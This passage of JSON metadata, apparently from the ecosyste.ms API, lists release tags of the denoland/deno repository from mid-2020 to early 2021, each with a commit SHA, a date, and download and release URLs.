ownload_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null